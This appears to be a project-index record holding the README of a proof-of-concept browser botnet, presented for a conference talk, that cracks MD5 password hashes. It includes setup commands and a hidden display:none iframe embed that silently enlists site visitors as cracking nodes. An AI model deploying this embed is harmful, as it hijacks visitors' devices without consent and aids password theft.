{"id":19948937,"url":"https://github.com/brannondorsey/distributed-password-cracking","last_synced_at":"2026-03-05T23:13:53.921Z","repository":{"id":44363230,"uuid":"107303723","full_name":"brannondorsey/distributed-password-cracking","owner":"brannondorsey","description":"Borrow CPU cycles from visitor's web browsers to crack MD5 password hashes 😲","archived":false,"fork":false,"pushed_at":"2020-12-01T15:08:30.000Z","size":773,"stargazers_count":182,"open_issues_count":2,"forks_count":62,"subscribers_count":11,"default_branch":"master","last_synced_at":"2024-12-05T19:42:09.842Z","etag":null,"topics":["botnet","browser-botnet","cracking","md5","password-cracking","web-workers"],"latest_commit_sha":null,"homepage":null,"language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/brannondorsey.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-10-17T17:47:04.000Z","updated_at":"2024-09-30T16:19:13.000Z","dependencies_parsed_at":"2022-08-29T17:41:21.429Z","dependency_job_id":null,"html_url":"https://github.com/brannondorsey/distributed-password-cracking","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brannondorsey%2Fdistributed-password-cracking","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brannondorsey%2Fdistributed-password-cracking/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brannondorsey%2Fdistributed-password-cracking/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/brannondorsey%2Fdistributed-password-cracking/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/brannondorsey","download_url":"https://codeload.github.com/brannondorsey/distributed-password-cracking/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230445926,"owners_count":18227060,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["botnet","browser-botnet","cracking","md5","password-cracking","web-workers"],"created_at":"2024-11-13T00:43:15.576Z","updated_at":"2026-03-05T23:13:48.844Z","avatar_url":"https://github.com/brannondorsey.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Distributed Password Cracking\n\nBorrow CPU cycles from visitor's web browsers to crack MD5 password hashes. Embedding a hidden `\u003ciframe\u003e` to a website will automatically add a visitor's browser as a node in a password cracking botnet. Their browser will received MD5 hashes and password candidates from a command-and-control server and report back any passwords it cracks for the duration of the time the visitor is browsing the \"infected\" website.\n\n![Screenshot](.screenshot.png)\n\n```html\n\u003c!-- add a single iframe embed to *your* website to add all visitors\n     as nodes in the password cracking botnet --\u003e\n\u003ciframe src=\"YOUR_WEBSITE.com:3000/embed\" style=\"display:none\"\u003e\n```\n\nThis is proof-of-concept code for the [Browser as Botnet talk](http://radicalnetworks.org/participants/brannon-dorsey) ([video](https://livestream.com/internetsociety/radnets17/videos/164720367)) at [Radical Networks 2017](http://radicalnetworks.org/). As such, it **is not** optimized. There are far [more efficient ways](https://github.com/brannondorsey/naive-hashcat) to crack passwords if that is your goal. This project is intended to illustrate how compute jobs can be massively distributed across browsers.\n\n**DISCLAIMER: This software is for educational purposes only. This software should not be used for illegal activity. The author is not responsible for its use. Don't be a dick.**\n\n## Getting Started\n\n```bash\n# clone this repo\ngit clone https://github.com/brannondorsey/distributed-password-cracking\ncd distributed-password-cracking\n\n# install the dependencies\nnpm install\n\n# run the command-and-control server\nnode server.js\n```\n\nNavigate to http://localhost:3000 to view the **unprotected** \"admin\" panel. This microsite allows you to view the activity of your botnet in real-time. To test that your password cracking network is working, open another browser tab to http://localhost:3000/embed. This creates a browser cracking node and launches one web worker per CPU on your machine. You should now see a connected node on the admin panel.\n\nThe server distributes password candidates and MD5 hashes to browser clients continuously as they connect. It uses:\n\n- [`data/passwords.txt`](data/passwords.txt): The first 100,000 passwords from the [Rockyou](https://wiki.skullsecurity.org/Passwords) password dictionary\n- [`data/hashes.txt`](data/hashes.txt): The `example0.hash` MD5 hashes distributed with [Hashcat](https://hashcat.net/hashcat/)\n\nCracked passwords are saved to `data/cracked.txt` like so:\n\n```\n5f4dcc3b5aa765d61d8327deb882cf99:password\n```\n\nReplace `passwords.txt` and `hashes.txt` to use your own password dictionary and MD5 hashes.\n\n### Embedding the `\u003ciframe\u003e`\n\nOnce your server is running adding nodes is as easy as including an iframe in your website. For this to work, your node server has to be publicly accessible from the web. That means setting up port forwarding/ssh tunnels or renting a VPS (on AWS or the like) without a firewall on port 3000. Add the below iframe to whatever web page you would like visitors to crack passwords from:\n\n```html\n\u003ciframe src=\"YOUR_WEBSITE.com:3000/embed\" style=\"display:none\"\u003e\n```\n**Note**: The node `server.js` enables CORs by default, but if you are proxying the connection (via Nginx, etc...) you may need to enable CORs on that proxy server as well.\n\n## Future Features\n\n- WebAssembly MD5 hashing. I'm close to this but ran out of time ahead of the talk. I'm reaching near native speeds in my tests, bringing hashrates on my machine from ~700K a second to 5M, nearly an order of magnitude speedup!\n- CPU throttling settings\n\n## License and Attribution\n\nThis software is released under an MIT license. You are free to use, modify, distribute, and sell it under those terms.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrannondorsey%2Fdistributed-password-cracking","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbrannondorsey%2Fdistributed-password-cracking","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbrannondorsey%2Fdistributed-password-cracking/lists"}